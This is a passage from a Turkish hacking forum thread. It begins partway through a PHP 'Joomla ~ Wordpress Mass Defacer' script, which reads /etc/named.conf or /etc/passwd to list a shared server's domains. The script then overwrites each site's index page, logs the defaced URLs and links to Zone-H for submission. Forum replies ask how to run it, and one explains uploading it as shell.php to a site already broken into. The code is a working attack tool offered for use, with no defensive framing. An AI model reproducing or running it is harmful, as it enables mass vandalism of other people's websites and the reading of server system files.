echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background: 
url("https://d33ds.co/img/bg3.png") repeat , 
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right, 
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
 </style>
<script type="text/javascript">
function change() {
if(********.getElementById(\'rcd\').checked == true) {
********.getElementById(\'tra\').style.display = \'\';
} else {
********.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
********.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
    }
$milaf_el_index = $_POST['defpage'];
    if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo '</body>
</html>';




04-07-2013 15:15
#2
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.700
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Konular:
152
Ticaret:
(0) %
Konsol üzerindenmi çalıştıracağız?
Kullanıcı İmzası
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
11-08-2015 15:25
#3
Üyelik tarihi:
08/2015
Nereden:
Malatya
Mesajlar:
173
Teşekkür (Etti):
25
Teşekkür (Aldı):
44
Konular:
18
Ticaret:
(0) %
Nasıl Yapıcaz Bunu Yardımcı Olurmusunuz
Kullanıcı İmzası
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
"VATANIMIN HA EKMEĞİNİ YEMİŞİM; HA UĞRUNA KURŞUN!"
25-12-2015 17:32
#4
Üyelik tarihi:
08/2015
Nereden:
TÜRKİYE
Mesajlar:
1.171
Teşekkür (Etti):
161
Teşekkür (Aldı):
245
Konular:
138
Ticaret:
(0) %
Ana Dizine upload edip hacklediğin sitenin yanına yazcan

www.Kırdğımsite/shell.php
Kullanıcı İmzası
25-12-2015 18:15
#5
axmetmcl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
405
Teşekkür (Etti):
66
Teşekkür (Aldı):
69
Konular:
9
Ticaret:
(0) %
Alıntı:
SlayeRHackeR´isimli üyeden Alıntı Mesajı göster
Nasıl Yapıcaz Bunu Yardımcı Olurmusunuz
konuyu hortlatmaya hiç gerek yok. 2013'te yazılmış ve anlamsız bir başlık.
arkadaş shell'den bahsetmek istemiş... ama forumda bundan cok daha iyi içerikler bulabilirsiniz.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı